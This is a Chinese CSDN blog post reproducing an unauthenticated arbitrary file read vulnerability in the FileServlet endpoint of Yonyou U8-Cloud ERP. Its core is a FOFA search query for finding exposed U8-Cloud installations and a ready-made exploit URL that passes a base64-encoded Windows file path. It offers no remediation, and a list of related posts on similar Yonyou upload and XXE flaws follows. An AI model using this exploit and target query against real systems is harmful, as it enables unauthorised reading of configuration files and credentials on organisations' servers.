用友U8-Cloud FileServlet接口存在任意文件读取漏洞

最新推荐文章于 2024-10-11 16:20:01 发布
最新推荐文章于 2024-10-11 16:20:01 发布
阅读量277 收藏
点赞数 5
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wan___she__pi/article/details/137199304
版权
本文探讨了U8cloud云ERP系统中的FileServlet存在的文件读取漏洞,指出该漏洞允许通过特定URL访问系统文件,强调了安全风险并提供了漏洞复现的方法。
摘要由CSDN通过智能技术生成

声明:

本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

简介

U8 cloud U8 cloud不同于传统的ERP,融合了交易、服务、管理于一体,基于全新的企业互联网应用设计理念,为企业提供集人财物客、产供销于一体的云 ERP 整体解决方案,全面支持多组织业务协同、智能财务,人力服务、构建产业链智造平台,融合用友云服务实现企业互联网资源连接、共享、协同。

该系统FileServlet存在任何文件读取漏洞。

资产搜索

fofa:

app="用友-U8-Cloud"

漏洞复现

http://127.0.0.1/service/~hrpub/nc.bs.hr.tools.trans.FileServlet?path=QzovL3dpbmRvd3Mvd2luLmluaQ==

QzovL3dpbmRvd3Mvd2luLmluaQ== 是C://windows/win.ini 的base64编码

cn_大腿
关注
【1day】用友 U8 Cloud系统upload.jsp接口任意文件上传漏洞学习
记录并分享学习安全的知识点..
12-05 529
用友U8 Cloud是中国企业软件公司用友软件推出的一款云端企业管理软件解决方案。它基于云计算和大数据技术,为企业提供全面的企业管理功能和服务。用友 U8 Cloud系统upload.jsp接口存在任意文件上传漏洞,攻击者通过上传恶意文件,从而在Web服务器上执行未经授权的操作。
漏洞复现】用友 GRP-U8 FileUpload 任意文件上传漏洞
alert['Hello World']
06-28 534
用友GRP-U8 FileUpload 接口存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。用友GRP-U8是一款功能全面、灵活度高、可定制性强的ERP软件,能够协助企业实现资源的高效管理,优化企业运营流程,提升整体管理水平。
用友u8c文件上传
weixin_51345872的博客
03-17 1921
文件上传
用友时空KSOA UploadImage任意文件上传漏洞
Keepb1ue的博客
12-24 2009
用友时空 KSOA 是根据流通企业前沿的IT需求推出的统的IT基础架构,它可以让流通企业各个时期建立的 IT 系统之间彼此轻松对话。由于用友时空设备开放了文件上传功能,但未鉴权且上传的文件类型、大小、格式、路径等方面进行严格的限制和过滤,导致攻击者可以通过构造恶意文件并上传到服务器,再利用该漏洞获取权限并执行任意命令。2.设置内容检测机制和白名单上传机制。1.通过防火墙等安全设备限制访问策略。3.如非必要,禁止公网访问该系统。app=“用友-时空KSOA”
漏洞复现】用友U8 Cloud FileServlet 任意文件读取
https://blog.echo234.cn/
03-26 549
用友U8 cloud /servlet/nc.bs.hr.tools.trans.FileServlet 存在任意文件读取漏洞,泄露数据库账号及密码等敏感信息。
漏洞复现】用友U8-Cloud FileServlet接口存在任意文件读取漏洞
https://blog.echo234.cn/
04-02 831
用友U8C是一款面向中小企业的ERP软件,为企业提供财务、采购、销售、人力资源、仓储物流等方面的综合管理解决方案。其优秀的功能和服务受到了众多企业的青睐和认可。其FileServlet存在任意文件读取漏洞,攻击者可通过该漏洞获取服务器主机敏感信息。
用友U8-Cloud接口FileServlet存在任意文件读取漏洞(含批量验证poc)
weixin_43567873的博客
03-29 164
用友U8-Cloud接口FileServlet存在任意文件读取漏洞
用友U8-Cloud接口FileServlet存在任意文件读取漏洞(含批量验证poc)_用友u8-cloud fileservlet接口存在任意文件读取漏洞
m0_60229361的博客
04-16 712
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
用友U8 Cloud FileServlet 任意文件读取漏洞复现
0xSec
03-31 456
用友U8 Cloud FileServlet接口存在任意文件读取漏洞,未经身份验证的远程攻击者通过漏洞可以获取系统内部配置文件,使系统处于极不安全的状态。
用友U8Cloud FileServlet 任意文件读取漏洞复现(含nuclei-poc)
m0_50797689的博客
03-26 478
用友U8Cloud FileServlet 任意文件读取漏洞复现(含nuclei-poc)
漏洞复现】用友U8-Cloud XChangeServlet XXE漏洞
qq_67810151的博客
05-11 533
用友U8 cloud /service/XChangeServlet接口存在XXE漏洞,未授权的攻击者可通过此漏洞获取数据库敏感信息,从而盗取服务器数据,造成服务器信息泄露。
用友NC-Cloud_importhttpscer接口存在任意文件上传漏洞(含批量验证poc)
weixin_43567873的博客
04-08 114
用友NC-Cloud_importhttpscer接口存在任意文件上传漏洞(含批量验证poc)
用友U8 Cloud smartweb2.showRPCLoadingTip.d XXE漏洞复现
0xSec
06-26 781
用友U8 Cloud smartweb2.showRPCLoadingTip.d 接口存在XML实体,攻击者可通过该漏洞获取敏感文件信息,攻击者添加恶意内容,通过易受攻击的代码,就能够攻击包含缺陷的XML处理器。
用友NC任意文件上传漏洞复现
热门推荐
Adminxe的博客
12-14 1万+
0x00 事件描述 用友NC是一款企业级管理软件,在大中型企业广泛使用。实现建模、开发、继承、运行、管理一体化的IT解决方案信息化平台。用友NC 为C/S 架构,使用JAVA编程语言开发,客户端可直接使用UClient,服务端接口为HTTP。 用友NC6.5的某个页面,存在任意文件上传漏洞漏洞成因在于上传文件处未作类型限制,未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏洞的远程攻击者可在目标系统上传任意文件执行命令。 0x01 漏洞原理 根据文档,FileRece..
【WEB应用安全测试指南–蓝队安全测试2】--超详细-可直接进行实战!!!亲测-可进行安全及渗透测试
Dreams°的博客
10-10 2006
任意文件下载漏洞不同于网站目录浏览,此漏洞不仅仅可遍历系统下 web中的文件,而且可以浏览或者下载到系统中的文件,攻击人员通过任意文件下载漏洞可以获取系统文件及服务器的配置文件等等。一般来说,他们利用服务器 API、文件标准权限进行攻击。严格来说,任意文件下载漏洞并不是一种 web漏洞,而是网站设计人员的设计“漏洞
什么是网络安全
m0_66268916的博客
10-07 553
全站防护是基于风险管理和WAAP理念打造的安全方案,以“体系化主动安全” 取代安全产品的简单叠加,为各类Web、API业务等防御来自网络层和应用层的攻击,帮助企业全面提升Web安全水位和安全运营效率。网络安全是指通过采取必要措施,防范对网络的攻击、侵入、干扰、破坏和非法使用以及意外事故,使网络处于稳定可靠运行的状态,以及保障网络数据的完整性、保密性、可用性的能力。网络安全涉及多个层面,包括硬件、软件及其系统中数据的保护和确保网络系统的连续可靠运行,防止数据被破坏、更改、泄露。
ISO 26262标准下的汽车软件架构设计与安全要求
yayuanjingkeji的博客
10-08 406
ISO 26262标准下的汽车软件架构设计与安全要求ISO 26262标准,作为国际公认的汽车功能安全标准,为汽车电子和电气系统的软件开发提供了详尽的指导与规范。在汽车软件架构设计中,遵循ISO 26262标准不仅关乎产品的功能实现,更直接关系到车辆的安全性能。以下将从几个关键方面探讨ISO 26262标准下的汽车软件架构设计。
智能运维与问题诊断工具:提升生产环境的安全稳定性
TechEnthusiast的博客
10-09 328
Prometheus是一个开源的监控和告警系统,而Grafana是一个强大的可视化平台。两者结合使用,可以为系统提供全面的监控和分析能力。ELK Stack是一套强大的日志管理和分析工具集,能够收集、处理、存储和可视化大量日志数据。Datadog是一个全面的监控和分析平台,提供了对应用、服务器、数据库和云服务的实时监控。New Relic提供了全面的应用性能监控和诊断能力,帮助开发团队快速识别和解决问题。PagerDuty是一个事件响应平台,帮助团队快速响应并解决IT事件和中断。
msvcr100.dll丢失的解决方法,如何安全下载 msvcr100.dll 文件:完全指南
最新发布
电脑修复君的博客
10-11 666
在使用 Windows 操作系统的电脑上运行某些程序或游戏时,可能会遇到一个常见的错误消息,提示缺少 msvcr100.dll 文件。这个 DLL 文件是 Microsoft Visual C++ 2010 Redistributable Package 的一部分,对于运行依赖于 C++ 的软件来说至关重要。如果你正面临 msvcr100.dll 缺失的问题,本文将引导你如何安全地下载并恢复 msvcr100.dll 文件,确保你的应用程序可以顺利运行。
用友U8-V861生产制造详解
"该资料详细介绍了用友U8-V861在生产制造领域的应用,包括关键概念、流程和计划管理。" 在用友U8-V861系统中,生产制造模块是企业资源计划(ERP)的重要组成部分,它涵盖了从需求预测、生产计划到执行的全过程。...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值